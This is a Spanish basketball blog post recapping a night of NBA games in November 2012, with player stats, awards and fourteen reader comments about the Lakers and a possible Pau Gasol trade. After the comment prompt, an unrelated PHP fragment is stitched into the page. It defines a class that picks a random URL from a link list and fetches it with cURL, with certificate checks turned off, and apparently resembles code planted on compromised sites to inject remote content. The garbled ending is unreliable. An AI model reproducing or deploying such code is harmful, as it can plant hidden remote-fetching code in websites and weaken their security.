La Crónica: ‘Matagigantes’ Grizzlies

24 de November de 2012 por Sancho88

12 partidos en la maratoniana jornada de ayer viernes, con 10 victorias locales y solo 2 victorias de los equipos visitantes, las conseguidas por los Hawks en Charlotte y por Spurs en Indiana tras una soberbia remontada. Tras el día de descanso por la festividad de Acción de Gracias, la NBA volvió a cargar las pilas para ver cosas muy interesantes.

Entre ellas, la confirmación de los Grizzlies como el gran equipo de este primer mes de competición. Le han ganado a los Spurs, a los Clippers, a los Thunder, Heat, Knicks y ayer a los Lakers, es decir, a casi todos los grandes favoritos al anillo. Van como una moto y no hay quien los pare. Anoche Lakers sufrieron de lleno la evidencia de no ser un equipo (98-106). Siendo muy optimistas, estos Lakers están a un 10 o un 15% como mucho de sus posibilidades. No hay nada sólido, y ayer cosecharon su segunda derrota consecutiva fuera en su gira por el Oeste volviendo a naufragar en la zona. Símplemente no hay nada ensayado ahí. Excepto Bryant y MWP, a los que anoche se les añadió Antawn Jamison, los demás parecen perdidos, deambulando sin saber qué hacer.

Solo un arreón de orgullo a base de triples en el último cuarto les dio la dignidad como equipo, pero hasta ahí. Kobe anotó 30 puntos pero Pau y Howard no hicieron absolutamente nada por segunda noche consecutiva. 13 puntos, 8 pérdidas, 8 rebotes, 9 faltas y 5/15 en TC entre los dos. Esto hay que cambiarlo, ya sea traspasando a Pau o cambiando absolutamente todo el sistema. Jamison debería salir de titular, como reclaman algunos foreros, porque la pareja Pau-Howard funciona fatal. En Memphis volvió Darrell Arthur tras más de un año lesionado y se unió a la gran actuación como equipo de los Grizzlies. Porcentajes muy buenos en TC y tiros libres, todos los titulares sumando dobles figuras en anotación y Zach Randolph corriendo al contraataque como si fuera un juvenil, para conseguir su undécimo doble-doble consecutivo (17-12). Ahí se suponía que debían ganar Lakers, pues es el estilo D’Antoni, pero aquí no corre ni Rita para bajar a defender. Al final Lakers jugaron el Kobe sistema y si alguien hubiera arrimado el hombro, igual se habría obrado el milagro de remontar. Duhon y Meeks lo hicieron a base de triples, pero el resto desaparecieron en los últimos minutos. Solo anotó Bryant en los últimos 6 minutos para Lakers. El recital defensivo de Marc Gasol es para enseñar en los colegios. Gay fue el mejor del encuentro con 21 puntos, 8 rebotes y 5 asistencias.

Los Celtics vencieron a Oklahoma en uno de los duelos más interesantes de la noche (100108). Paul Pierce y Jeff Green se reivindicaron como una de las mejores parejas de aleros de la liga, anotando 44 puntos entre los dos. Garnett rozó el doble-doble (18-9) y Rondo siguió repartiendo pases de canastas (16). 36 partidos seguidos ya van. El record total de Magic tiembla. En OKC el trío lá lá lá, es decir, Durant-Westbrook-Ibaka fracasaron en su intento de remontada. Solo un 25% de triples en los Thunder, mientras que Boston anotó 9 de 17, con Pierce y Terry sumando 4 cada uno, dos más que todos los Thunder al completo. Ayer se la pegó Kevin Martin, con un triste 1/7 en tiros de campo.

El ‘horrorcore’ se dibujó en la cara de los Clippers frente a los Nets. Anoche en Brooklyn sonó una melodía triste en un partido soso en el que jugaron a ver quién fallaba más tiros a canasta (76-86). Los Clippers solo anotaron 29 puntos en toda la segunda parte, parecido a los 26 puntos de Brook López en todo el partido. Esta vez Jo Jo se marcó un partidazo con 19 puntos y un grandioso 8/12 en TC, con la temporada tan mala que llevaba de acierto. Porcentajes pésimos en ambos equipos y los Clippers sumaron a su desacierto general 20 pérdidas de balón; esta vez Crawford naufragó desde fuera saliendo desde el banquillo. No todos los días se les puede aparecer la virgen a los Clippers, porque están jugando con fuego muchas veces esperando al salvador Crawford y anoche no tuvo su partido.

En Charlotte, los Hawks cosecharon su 4º victoria consecutiva gracias al doble-doble de Al Horford (26-13), los 4 triples de Kyle Korver y los 13 puntos y 12 asistencias de Jeff Teague (101-91). El dominicano Horford sumó su quinto doble-doble de la temporada, y el tercero por encima del 20-10. Elton Brand ya tiene sucesor. Los Bobcats, por su parte, dieron guerra como siempre y Ramon Sessions fue el mejor con 22 puntos, pero nada pudieron hacer ante el 11/22 en triples de los Hawks.

En Orlando los Magic volvieron a remontar un partido que tenían perdido contra los Cavaliers (104-108), a quienes han ganado en los últimos 10 partidos en los que se han enfrentado. No pierden desde 2010 contra ellos. Arron Afflalo y Jameer Nelson anotaron 4 triples cada uno y fueron una pesadilla para los ‘Cavs’ desde fuera. Afflalo llegó hasta los 19 puntos y Nelson hasta los 22 puntos, 6 rebotes y 6 asistencias. JJ Redick, no obstante, fue el brazo ejecutor en los últimos 22 segundos, donde anotó 8 tiros libres consecutivos. Por parte de los Cavs, Anderson Varejao superó de nuevo los 15 rebotes por cuarta vez en los últimos cinco partidos y anotó 17 puntos. El esfuerzo combinado de los  rookies Tyler Zeller y Dion Waiters (38 puntos entre los dos) fue insuficiente. Ojito a la estampida estilo Jumanji que provocó Glen Davis en la grada en el últmo cuarto.

Los Pistons siguen mejorando su imagen y anoche se cargaron a los Raptors en el ‘clutch time’ (90-91). Los 34 puntos de Bargnani no fueron suficientes para doblegar a unos Pistons que, esta vez sí, arroparon en conjunto a Monroe. El 19-11 del pívot fue acompañado por buenas actuaciones de Tayshun Prince y Brandon Knight, quien sentenció el partido con un clutch a falta de 8 segundos. Lowry falló un tiro en suspensión que podría haber dado la victoria a los suyos. Drummond apareció desde el banquillo con un sensacional 13-13 en 24 minutos. En los Raptors Calde volvió a ser suplente y Lowry no supo guiar a los suyos, que jugaron rematadamente mal.

Los Spurs fueron capaces de remontar fuera de casa frente a unos tristes Pacers que siguen echando de menos a su tirador Danny Granger (104-97). 31 puntos en el último cuarto de los ‘Espuelas’ y un parcial de 13-2 en los últimos 5 minutos fueron la clave para dar la décima victoria de temporada a los Spurs frente a unos Pacers que fallaron 8 lanzamientos consecutivos al final del partido. Los viejos rockeros nunca mueren, y por eso entre Parker, Duncan y Ginobili anotaron 74  de los 104 puntos de su equipo. 22-17 Duncan, 33-10 Parker y 19 Manudo. Los 22 puntos de West fueron lo más destacable por parte del conjunto amarillo.

Por su parte, los Knicks siguen perdiendo fuelle y esta vez se dejaron ir contra los Rockets en su gira por el Oeste (103-131). Chandler Parsons jugó su mejor partido como profesional al anotar 31 puntos y unirse a los 33 de James Harden para vapulear a los Knicks que se deshinchan poco a poco. Los 37 puntos de Carmelo Anthony no valieron para nada. Jeremy Lin dibujó una sonrisa maléfica frente a sus ex y convirtió 13 puntos y 7 rebotes en el primer enfrentamiento contra el equipo que le vio nacer deportivamente. La pareja interior de los Rockets, Patterson y Asik se comieron a Chandler. El ‘small ball’ al que juegan los Knicks ya no funciona, y la vuelta de Stoudamire debería solucionar estos problemas.

En el resto de partidos, los Nuggets aprovecharon el pésimo partido de Steph Curry por parte de los Warriors para ponerse por encima del 50% de victorias (7-6). Iguodala hizo lo que quiso y Gallinari y Lawson le ayudaron. Los Nuggets jugaron como un equipo y se divirtieron. Así los queremos ver. En los Warriors volvió a faltar actitud y solo Landry y Jack saliendo desde el banquillo aportaron algo al esfuerzo personal de David Lee y Klay Thompson. Al final, (91-102) para los Nuggets.

En Utah los Kings tiraron a la basura un partido que ganaban de 13 a falta de 8 minutos (102-104). La lesión de Mo Williams por un esguince en el primer cuarto no impidió a los suyos remontar un partido en el que no hicieron demasiados méritos para conseguir la victoria. Gordon Hayward ajustició a los morados con un clutch a falta de 5 segundos. De nada valieron los 6 hombres en dobles figuras de anotación por Sacramento, ante los 23 puntos de Hayward y 20 de Marvin Williams, fundamental en la remontada de los Jazz.

En Phoenix los Hornets forzaron una prórroga contra los Suns después de dominar toda la primera parte, pero llegaron muy cansados al final y acabaron cediendo la cuchara (108-111). Sin Davis una noche más, Ryan Anderson y Greivis Vásquez firmaron grandes actuaciones. 34-11 para Anderson y 25 puntos y 14 asistencias para Vásquez, pero los Suns tuvieron mejor banquillo, con 50 de los 111 puntos anotados por los hombres de la rotación liderados por un gran PJ Tucker, unidos al 20-2-8 de Dragic y a los 23 puntos del gemelo Markieff Morris. Gortat y Scola ya no se estorban en el quinteto, juegan por separado y ambos estuvieron muy discretos.

Por último, los Blazers pusieron el 50% de victorias gracias al ‘backourt’ en su partido contra los Wolves (103-95). El rookie Damian Lillard y el escolta Wes Matthews se combinaron para anotar 58 puntos con un excelente 23/34 en TC entre los dos, incluyendo 9 triples. En Minnesota no funcionó el banquillo ni el tiro exterior, y el ‘frontcourt’, con Kevin Love y Pekovic al frente, se quedaron demasiado solos, en un bonito duelo en la pintura contra Aldridge y Hickson.

PREMIOS

MVP: Al Horford. Sus 26 puntos, 13 rebotes y 3 tapones con solo 4 tiros de campo fallados (13/17) aniquilaron a los Bobcats. El 28-4-8 de Damian Lillard en la victoria contra los Timberwolves también le hacen asomarse en el premio para los mayores. También destacaron Iguodala en el triunfo frente a los Warriors, 29-6-2; James Harden 33-4-9 y Chandler Parsons 31-5-4-4 por parte de los Rockets en la paliza a los Knicks; Parker con un doble-doble (33 puntos y 10 asistencias) para guiar a los Spurs en su remontada contra los Pacers; López con 26 puntos y 5 rebotes para ganar a los Clippers; y Paul Pierce con 27 puntos y 4 rebotes en la victoria frente a los Thunder.

Rookie: Como no, el ‘point guard’ de los Blazers arremete de nuevo. Los números de Damian Lillard no son normales en este primer mes de competición. 20-3-6. ¡Qué tiempos aquellos de Tyreke…! Dion Waiters también hizo un partidazo con los Cavs al anotar 25 puntos, 3 rebotes y 5 asistencias; Zeller se sumó con un buen 13-9; Andre Drummond  sumó unos geniales 13 puntos y 13 rebotes en la victoria de los Pistons contra Toronto; Jeff Taylor anotó 16 puntos para los Bobcats y MKG 11 puntos, 7 rebotes, 2 robos de balón y 4 tapones. Decepcionaron Harrison Barnes en los Warriors (4 puntos, 2 rebotes y 5 faltas en 15 minutos) y Austin Rivers en los Hornets, donde ya no es ni titular. T-Rob sigue sin minutos en los Kings (4-3 en 13 minutos) y Terrence Jones en los Rockets. Sullinger estuvo discretito en la victoria de los Celtics (8-3), y Jeremy Lamb y Perry Jones ni aparecieron en los Thunder. También muy flojitos Singler saliendo de titular en los Pistons (6-2-1) y Terrence Ross en los Raptors con un 0/5 en 17 minutos saliendo desde el banquillo.

Sorpresa: El doble-doble de Jermaine O’Neal (13-11) es un sorpresón, así como los 11 puntos de Omri Casspi.

Decepción: Pau Gasol y Dwight Howard. Ya lo dijimos arriba. 13 puntos, 8 pérdidas, 8 rebotes, 9 faltas y 5/15 en TC entre los dos en la derrota de los Lakers. No hay por donde cogerlo.

Esfuerzo en vano: Los 37 puntos de Carmelo Anthony y los 34 de Bargnani no valieron para nada en las derrotas de los Knicks en Houston y de Raptors en Detroit respectivamente. El 34-11 de Ryan Anderson y el 25-5-14 de Vásquez fueron también directamente a la basura, así como el 26-7-8 de Russell Westrbrook, los 29 puntos de Kevin Durant, los 30 de Kobe Bryant en los Lakers, y el no menos despreciable 24-13 de Kevin Love contra los Blazers.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. txusma dice:
    #1

    Ha pensado MWP a dedicarse al futbol amaericano como Quaterback? Lleva 2 pases similares en 2 partidos consecutivos, no?

      Citar

  2. Pop dice:
    #2

    Sï,sí, brutal MWP con esos pases. Por cierto ayer cuajó una actuación bastante decente, y realizó un par de jugadas con lo que yo llamo “el efecto Salinas”: me hago tal lío yo mismo tratando de fintar que mis oponentes acaban perdiendo el equilibrio también, y así anoto…

      Citar

  3. Ruxixón dice:
    #3

    Bueno,ya está viciado de nuevo el ambiente en Los Ángeles,que poco ha durado la calma tras la marcha de Mike Brown.Pau sugiriendo que se le busque cerca del aro y criticando las rotaciones y D’Antoni diciendo que lo sentó para poder ganar el partido y que así estará más descansado contra Dallas.Huele a críticas,reinvidaciones de Pau y esta vez si,traspaso del español.D’Antoni quiere que su 4 sea sólido a la hora de jugar a 5-6 metros y busque tiros de media distancia y forzando a Pau a ese modelo lo estás desaprovechando -también Pau debe aceptar las críticas porque ayer estuvo poco enchufado en el partido-…..¡Bargnani!

    Memphis muy bien.La hoja de estadísticas de Marc no refleja lo que aportó al equipo y eso que no hizo malos números,14-8.Y en general todos perfectos,como un equipo,aunque hubo momentos de desconexión que me recordaron a la eliminatoria de Clippers.

      Citar

  4. Denise dice:
    #4

    Yo no soy partidario de traspasar a Pau, porque creo que los anillos se ganan por dentro (a no ser que tengas a Lebron) pero está claro que Pau o sale o no puede seguir jugando a 7 metros.

    Una opción que creo que nadie ha planteado y no vería con malos ojos para ambos equipos, sería la de traspasar a Pau a los Hornets por Ryan Anderson y el expiring de 13 kilos de Rashard Lewis. Los Lakers reducirían su masa salarial el próximo año y se hacen con el mejor hombre alto que tira de 3 de la NBA.
    Y por los Hornets, se harían con un jugador mas mediático, con cartel de All-Star y se montarían un buen Big 3 con Anthony Davis y Eric Gordon; y aún tendrían bastante margen para moverse en el mercado. Y además conseguirían para dentro de 2 años, un expiring magnífico de 20 millones para utilizar una gran parte de ellos en renovar a Anthony Davis.

      Citar

  5. Santi dice:
    #5

    El blog anda muy dinámico últimamente. Felicidades por un buen trabajo… a diferencia de otros (empieza por P y anda un tanto desorientado últimamente con cierto entrenador que ha llegado hace poco a su equipo… y no me quiero enrollar, que uno se pone a escribir y en fin). Por cierto, no quiero decir chorradas pero ayer el Dion Waiters me recordó un poco a Kobe Bryant (al que jugó ayer me refiero). Saludos

      Citar

  6. nba dice:
    #6

    Parece olvidar D’antoni quien destrozo a los jugadores interiores de team USA en las olimpiadas

      Citar

  7. nba dice:
    #7

    Impresionante partido de Lakers, todavia estoy frotandome los ojos, todo el mundo aportando y por fin Jamison demostrando de una vez porque lo ficharon los Lakers, buena noticia.
    Dallas en cambio, cuanto echan de menos a Dirk

      Citar

  8. Jose Luis dice:
    #8

    Denise, Lewis está en Miami Heat desde principios de temporada. No sé si habría otra manera de encajarlo en Hornets, pero sí en Raptors como dice el compañero. Bargnani y Fields? este también puede abrir la cancha y ya le dirigió D’Antoni en NY. Otros contratos que encajan son Calderón, Johnson, y Kleiza… pero no creo que los Raptors quieran sacar solo a Pau por Bargnani + el expiring de Calde. Por otro lado, Amir Johnson no les sirve de nada a los Lakers, así que solo veo Bargnani + Fields o Kleiza… o metiendo a Amir Johnson si es Pau + Hill… pero eso lo veo un robo a los Lakers.

      Citar

  9. Denise dice:
    #9

    Jose Luis:
    Denise, Lewis está en Miami Heat desde principios de temporada. No sé si habría otra manera de encajarlo en Hornets, pero sí en Raptors como dice el compañero. Bargnani y Fields? este también puede abrir la cancha y ya le dirigió D’Antoni en NY. Otros contratos que encajan son Calderón, Johnson, y Kleiza… pero no creo que los Raptors quieran sacar solo a Pau por Bargnani + el expiring de Calde. Por otro lado, Amir Johnson no les sirve de nada a los Lakers, así que solo veo Bargnani + Fields o Kleiza… o metiendo a Amir Johnson si es Pau + Hill… pero eso lo veo un robo a los Lakers.

    Ya sé que está en los Heat, pero creo que los Hornets le pagan 13 kilos este año como consecuencia del buyout

      Citar

  10. nba dice:
    #10

    Pues no se, pero a mi me gustaria ver a Pau en un equipo tipo Warriors-Bucks-Hawks,
    ya que los Lakers en el futuro deben ser el equipo de Nash-Bryant-Howard, ya que Pau cobra demasiado para lo que realmente D’antoni lo va a utilizar

      Citar

  11. Jose Luis dice:
    #11

    Pero no pueden usarlo como traspaso Denise, estoy seguro de ello.

      Citar

  12. Ruxixón dice:
    #12

    A mí me tira Nuggets para Pau,creo que con Karl en el banquillo y como está formado el equipo le puede dar un empujón importante a Denver.Lo malo es que tendría que mover a Gallinari/McGee.McGee creo que está muy bien para establecer una rotación tanto a Pau como a Faried (Pau-McGee / Faried-McGee / Faried – Pau) mientras que el italiano es el único tirador de una plantilla con falta de ellos.

    De momento se han suavizado las declaraciones,pero Jamison parece que le está comiendo la tostada.Teóricamente Jamison casa mejor con el concepto de 4 para un sistema de D’Antoni,lo que no quiere decir que sea mejor que Pau.

      Citar

  13. Pop dice:
    #13

    De hecho los mejores minutos de LA ayer fueron con Pau de 5 y Jamison de 4. Vamos a ver cómo estructura todo.
    Ayer Howard seguía siendo nulo en ataque, aunque en defensa estuvo muy bien.

      Citar

  14. GreenPride dice:
    #14

    Bueno pues de esta jornada vi los tres grandes partidos.
    En Boston, los Celtics dieron una muestra de lo que pueden llegar a ser cuando estén todos enchufados. Con el equipo intenso en el rebote (y lo perdieron por 4) y Pierce, Green y Terry produciendo por fuera y Rondo distribuyendo el juego consiguieron doblegar a uno de los favoritos, los Thunder. En estos a parte de Durant y Westbrook sigue muy bien Ibaka aunque les faltó más aportación del resto para contrarrestar el buen partido de los bostonianos.
    En Memphis despropósito de los interiores de los Lakers. Pau y Howard están más perdidos que un pulpo en un garaje y fueron los secundarios (Duhon, Meeks y sobre todo Jamison) los que mantuvieron a los Lakers a una diferencia aceptable aunque siempre con la sensación de ir muy por detrás en el juego. Al final el Kobe-sistema del último cuarto no fue suficiente. Memphis queda con la mejor marca de la liga gracias a un gran juego interior. Marc hace de todo en la pista y Zach es un martillo por dentro y Gay, Conley y Allen aportan cada uno en los suyo (dirección, puntos e intensidad). Además volvió Darrel Arthur que puede ser un gran refuerzo para el futuro.
    Por último en Brooklyn victoria de los Nets ante unos Clippers que empiezan a desinflarse. CP3 no está a su grandioso nivel habitual y Crawford empieza a perder algo de la brillantez que exhibía. Por Brooklyn Lopez fue un dolor de cabeza constante y primer partido en condiciones de JoJo anotando desde las posiciones que se le pide.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>